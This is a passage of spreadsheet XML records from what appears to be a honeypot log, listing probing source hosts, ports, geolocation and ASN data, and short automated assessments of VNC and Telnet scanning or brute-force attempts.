    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_SSH_H14&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_VNC_H35"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;22&amp;&amp;19647&amp;&amp;52094&amp;&amp;55525&amp;&amp;54528&amp;&amp;57875&amp;&amp;51442&amp;&amp;56417&amp;&amp;59906&amp;&amp;63375&amp;&amp;50364&amp;&amp;64906&amp;&amp;55308&amp;&amp;60049&amp;&amp;59276&amp;&amp;62330&amp;&amp;52421&amp;&amp;52519"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3ef5"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No VNC connections detected, possible sign of evasion tactics to avoid detection. Malicious actors may attempt to conceal their activities by not using VNC or other common protocols. This could indicate an advanced threat actor attempting to stay under the radar."/>
    <m/>
  </r>
  <r>
    <x v="515"/>
    <x v="515"/>
    <s v="unassigned.172-81-62-207.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:09:33"/>
    <d v="2024-02-04T18:04:00"/>
    <d v="2025-04-29T00:09:33"/>
    <n v="593"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53779&amp;&amp;37814&amp;&amp;60245&amp;&amp;54552&amp;&amp;62615&amp;&amp;57956&amp;&amp;63076&amp;&amp;56834&amp;&amp;53587&amp;&amp;60789&amp;&amp;50599&amp;&amp;54637&amp;&amp;61066"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2022-07-15 16:05:05"/>
    <s v="2030-07-15 16:05:05"/>
    <s v="2025-01-12 12:07:03"/>
    <s v="['NS1.DYNU.COM', 'NS2.DYNU.COM', 'NS3.DYNU.COM', 'NS4.DYNU.COM', 'NS5.DYNU.COM', 'NS6.DYNU.COM']"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited']"/>
    <s v="None"/>
    <x v="8"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:ac51:3ecf"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="VNC connection attempt was detected, possibly a brute force login or reconnaissance scan. No VNC data was received indicating a potential issue with the service. Connection attempt seems suspicious and might be part of larger malicious activity."/>
    <s v="Brute Force _x000a__x000a_(assuming VNC stands for Virtual Network Computing, commonly targeted by brute force attacks)"/>
  </r>
  <r>
    <x v="516"/>
    <x v="516"/>
    <s v="unassigned.172-81-62-237.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:09:25"/>
    <d v="2024-02-17T18:04:17"/>
    <d v="2025-04-29T00:09:25"/>
    <n v="859"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MT-CPA_H21"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;10893&amp;&amp;50332&amp;&amp;58076&amp;&amp;60115&amp;&amp;53618&amp;&amp;58345&amp;&amp;65362&amp;&amp;58054&amp;&amp;54603&amp;&amp;59551&amp;&amp;65008&amp;&amp;61667&amp;&amp;56861&amp;&amp;60259&amp;&amp;57709&amp;&amp;56687&amp;&amp;59599&amp;&amp;57582&amp;&amp;50009&amp;&amp;60783"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3eed"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <s v="VNC connections are being made without data transfer, indicating potential reconnaissance or probe attempts to identify vulnerable systems. The lack of data transfer suggests the attacker may be testing connection limits or system vulnerabilities. This could be a precursor to more malicious activity."/>
    <s v="VNC Attack"/>
  </r>
  <r>
    <x v="517"/>
    <x v="517"/>
    <s v="unassigned.172-81-62-185.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:08:41"/>
    <d v="2023-08-04T11:46:00"/>
    <d v="2025-04-29T00:08:41"/>
    <n v="958"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H3&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H26"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;18471&amp;&amp;61092&amp;&amp;55630&amp;&amp;58223&amp;&amp;64920&amp;&amp;52880&amp;&amp;51465&amp;&amp;56025&amp;&amp;64849&amp;&amp;53169&amp;&amp;59138&amp;&amp;52507&amp;&amp;61405&amp;&amp;56926&amp;&amp;64960&amp;&amp;52299&amp;&amp;65096&amp;&amp;65411&amp;&amp;54958"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3eb9"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="518"/>
    <x v="518"/>
    <s v="unassigned.172-81-62-244.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:08:35"/>
    <d v="2023-12-07T07:06:00"/>
    <d v="2025-04-29T00:08:35"/>
    <n v="1231"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H4&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H37"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;58903&amp;&amp;62098&amp;&amp;64440&amp;&amp;54886&amp;&amp;49539&amp;&amp;60936&amp;&amp;56745&amp;&amp;54942&amp;&amp;58768&amp;&amp;62437&amp;&amp;63284&amp;&amp;62759&amp;&amp;51635"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3ef4"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="519"/>
    <x v="519"/>
    <s v="unassigned.172-81-62-238.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:08:27"/>
    <d v="2024-04-17T13:25:57"/>
    <d v="2025-04-29T00:08:27"/>
    <n v="646"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_VNC_H9"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;62915&amp;&amp;58115&amp;&amp;65214&amp;&amp;63081&amp;&amp;55123&amp;&amp;50308&amp;&amp;53540&amp;&amp;62969&amp;&amp;59921&amp;&amp;65260&amp;&amp;62798&amp;&amp;56089&amp;&amp;62204&amp;&amp;65369&amp;&amp;59058&amp;&amp;61234&amp;&amp;57987&amp;&amp;63474&amp;&amp;54103&amp;&amp;58198"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3eee"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This suggests an attempt to access VNC service, possibly for unauthorized remote access. _x000a_No login credentials were provided (Data_VNC:NA). _x000a_This may indicate a scanning or probing activity rather than a successful connection."/>
    <s v="VNC Scanning"/>
  </r>
  <r>
    <x v="520"/>
    <x v="520"/>
    <s v="unassigned.172-81-62-167.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:07:22"/>
    <d v="2023-11-29T22:25:16"/>
    <d v="2025-04-29T00:07:22"/>
    <n v="727"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1549&amp;&amp;5900&amp;&amp;62681&amp;&amp;59175&amp;&amp;52540&amp;&amp;62503&amp;&amp;61496&amp;&amp;51095&amp;&amp;53108&amp;&amp;62660&amp;&amp;58751&amp;&amp;52121&amp;&amp;63413&amp;&amp;58347&amp;&amp;49847&amp;&amp;51993&amp;&amp;52307&amp;&amp;52313&amp;&amp;53503&amp;&amp;60167&amp;&amp;60132&amp;&amp;61690&amp;&amp;65031&amp;&amp;64326&amp;&amp;56893&amp;&amp;54523"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2022-07-15 16:05:05"/>
    <s v="2030-07-15 16:05:05"/>
    <s v="2025-01-12 12:07:03"/>
    <s v="['NS1.DYNU.COM', 'NS2.DYNU.COM', 'NS3.DYNU.COM', 'NS4.DYNU.COM', 'NS5.DYNU.COM', 'NS6.DYNU.COM']"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited']"/>
    <s v="None"/>
    <x v="8"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:ac51:3ea7"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No logs available for analysis, unable to determine possible malicious activity."/>
    <m/>
  </r>
  <r>
    <x v="521"/>
    <x v="521"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:04:44"/>
    <d v="2025-04-29T00:04:44"/>
    <d v="2025-04-29T00:04:44"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Jind"/>
    <s v="Jīnd (Dyal Bagh Colony)"/>
    <s v="1268907"/>
    <s v="126102"/>
    <s v="29.3192"/>
    <s v="76.311"/>
    <s v="132771"/>
    <s v="FIBREAIR-AS"/>
    <s v="Speednet Julana"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67ad:d34e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No TELNET activity detected, which might indicate that an attacker tried to scan or exploit this service but was unsuccessful or uninterested. _x000a_TELNET services are often targeted by attackers for potential brute-force login attempts._x000a_This could be a sign of a reconnaissance phase where the attacker identifies available services on the system. &amp;&amp; The data indicates that there was an attempt to access the TELNET service, but it was unsuccessful or not available, as indicated by NA (not applicable) status. This could be a scanning activity or a failed login attempt. No malicious activity is confirmed as the service was either unavailable or inaccessible."/>
    <s v="Port Scan"/>
  </r>
  <r>
    <x v="522"/>
    <x v="522"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:04:12"/>
    <d v="2025-04-28T23:56:33"/>
    <d v="2025-04-29T00:04:12"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="Multiplay-Prepaid"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d1:2bec"/>
    <s v="C-I"/>
